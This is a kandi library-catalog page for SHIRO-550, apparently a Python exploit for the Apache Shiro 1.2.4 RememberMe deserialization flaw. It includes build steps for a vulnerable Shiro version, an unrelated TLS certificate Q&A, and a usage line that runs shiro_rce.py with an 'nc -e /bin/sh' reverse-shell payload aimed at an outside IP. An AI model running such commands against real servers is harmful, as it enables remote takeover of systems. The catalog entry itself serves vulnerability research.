SHIRO-550 | Shiro RememberMe 1.2.4 反序列化 漏洞 | Security Framework library
kandi X-RAY | SHIRO-550 Summary
kandi X-RAY | SHIRO-550 Summary
Shiro RememberMe 1.2.4 反序列化 漏洞
Support
Quality
Security
License
Reuse
Top functions reviewed by kandi - BETA
- Encodes a rememberme command
- Send POC to Shiro
SHIRO-550 Key Features
SHIRO-550 Examples and Code Snippets
python3 shiro_rce.py http://10.10.20.166:8080/samples-web-1.2.4/ "nc -e /bin/sh 192.168.5.86 9999"
_____ _ _ _____ _____ ____ _____ _____ ___
/ ____| | | |_ _| __ \ / __ \ | ____| ____|/ _ \
| (___ | |__| | | | | |__)
git clone https://github.com/apache/shiro.git
cd shiro
git checkout shiro-root-1.2.4
mvn install
mvn -v
Apache Maven 3.6.2 (40f52333136460af0dc0d7232c0dc0bcf0d9e117; 2019-08-27T11:06:16-04:00)
Maven home: /opt/apache-maven-3.6.2
Java version: 1.8.0_
python3 shiro_rce.py
_____ _ _ _____ _____ ____ _____ _____ ___
/ ____| | | |_ _| __ \ / __ \ | ____| ____|/ _ \
| (___ | |__| | | | | |__) | | | |______| |__ | |__ | | | |
\___ \| __ | | | | _ /| | | |______|_
Community Discussions
Trending Discussions on Security Framework
QUESTION
I have an x509 certificate as a file/byte array that I'd like to use to verify the signature provided in a CertificateVerify
TLS message. I think I can use SecKeyVerifySignature
once I've determined the certificate's key algorithm (SecKeyAlgorithm
parameter) and initialized the signedData
from the transcript hash (concatenated to the context string, etc.).
openssl x509
reports the certificate's key like
ANSWER
Answered 2020-Apr-18 at 14:14I misunderstood my own goals.
The CertificateVerify
message provides a digest of the handshake up to that point. The server uses its certificate's private key to perform that signature. As indicated in the TLS 1.3 specification, the signature algorithm is part of the CertificateVerify structure
Community Discussions, Code Snippets contain sources that include Stack Exchange Network
Vulnerabilities
No vulnerabilities reported
Install SHIRO-550
You can use SHIRO-550 like any standard Python library. You will need to make sure that you have a development environment consisting of a Python distribution including header files, a compiler, pip, and git installed. Make sure that your pip, setuptools, and wheel are up to date. When using pip it is generally recommended to install packages in a virtual environment to avoid changes to the system.
Support
Reuse Trending Solutions
Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items
Find more librariesStay Updated
Subscribe to our newsletter for trending solutions and developer bootcamps
Share this Page